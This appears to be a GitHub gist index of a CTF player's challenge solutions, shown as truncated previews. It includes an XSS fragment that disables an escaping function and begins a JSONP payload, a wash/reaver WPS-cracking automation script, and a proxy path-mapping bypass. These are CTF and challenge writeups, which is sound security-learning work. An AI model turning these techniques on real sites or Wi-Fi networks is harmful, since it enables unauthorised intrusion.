Moved to my blog.
jorgectf
/ DragonSector_2020_Scratchpad.md
Last active Nov 22, 2021
Solution for DragonSector 2020 CTF's ScratchPad challenge.
jorgectf
/ DefCamp_2020.md
Last active Nov 22, 2021
Solution for some DefCamp 2020 CTF's Web challenges.
View DefCamp_2020.md
Moved to my blog.
View CybexCTF_2021_WaloW3b.html
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <meta charset="UTF-8"> | |
| </head> | |
| <body> | |
| <script> | |
| const localURL = "https://127.0.0.1:4000" |
jorgectf
/ AeroCTF_2021_Not-received-points.md
Last active Mar 1, 2021
AeroCTF 2021's "Not received points" solution.
View AeroCTF_2021_Not-received-points.md
Void _.escape
// this made empty the client-side func that escaped our input
_.escape = function(s) {return s}Leak flag image uri
// XSS through JSONP from accounts.google.com
ipt src="https://accounts.google.com/o/oauth2/revoke?callback=(function(){
jorgectf
/ NahamConCTF_2021_AgentTester.py
Last active Mar 15, 2021
NahamCon CTF's AgentTester solver.
View NahamConCTF_2021_AgentTester.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from selenium import webdriver | |
| from selenium.webdriver.common.keys import Keys | |
| from selenium.webdriver.common.by import By | |
| from selenium.webdriver.support.ui import WebDriverWait | |
| from selenium.webdriver.support import expected_conditions as ec | |
| from selenium.webdriver.common.desired_capabilities import DesiredCapabilities | |
| import random, string | |
| import requests | |
| def random_string(length): |
View LineCTF_2021_Your-Notes.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from selenium import webdriver | |
| from selenium.webdriver.common.keys import Keys | |
| from selenium.webdriver.common.by import By | |
| from selenium.webdriver.support.ui import WebDriverWait | |
| from selenium.webdriver.support import expected_conditions as ec | |
| from selenium.webdriver.common.desired_capabilities import DesiredCapabilities | |
| import random, string, subprocess | |
| def random_string(length): | |
| return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length)) |
jorgectf
/ washXreaver.sh
Last active Aug 14, 2021
— forked from iGh0st/d4rk-r34v3r.sh
Wash and Reaver automation script.
View washXreaver.sh
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| if [ "$#" -ne 1 ]; then | |
| echo "Illegal number of parameters" | |
| echo "./{} INTERFACE" | |
| fi | |
| interface=$1 | |
| if (( EUID != 0 )); then |
View sync_discord_bot.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from discord import Client, CategoryChannel | |
| import discord.utils | |
| from time import sleep | |
| import threading | |
| import asyncio | |
| import os | |
| class Bot(Client): | |
| guild = None | |
| guild_id = os.getenv("DISCORD_GUILD_ID", None) |
jorgectf
/ intigriti-xss-10-2021.md
Last active Nov 21, 2021
Intigriti's October 2021 XSS challenge writeup.
View intigriti-xss-10-2021.md
TL;DR
This month's challenge consists of the exploitiation of a custom js code hosted on a document with a Halloween style. In overview we'll be injecting JS inside a <script> tag (thanks to an interesting detail in the CSP) that was previously injected into a document's div's innerHTML.
The solution of this challenge has been found in collaboration with @carlospolopm.
Initial approach
jorgectf
/ TSJ_CTF_2022_NimjaAtNantou.md
Last active Mar 26, 2022
TSJ CTF 2022 - Nimja at Nantou solution
View TSJ_CTF_2022_NimjaAtNantou.md
Nimja at Nantou
map /hello-from-the-world/key http://127.0.0.1:80/forbidden
map /hello-from-the-world/ http://127.0.0.1:80
map /service-info/admin http://127.0.0.1:5000/forbidden
map /service-info/ http://127.0.0.1:5000/
Mapping /hello-from-the-world/ to http://127.0.0.1:80 (without the last slash) makes /hello-from-the-world//key not to match the first rule but provides a valid path to the second rule. This let us get the key:
OlderNewer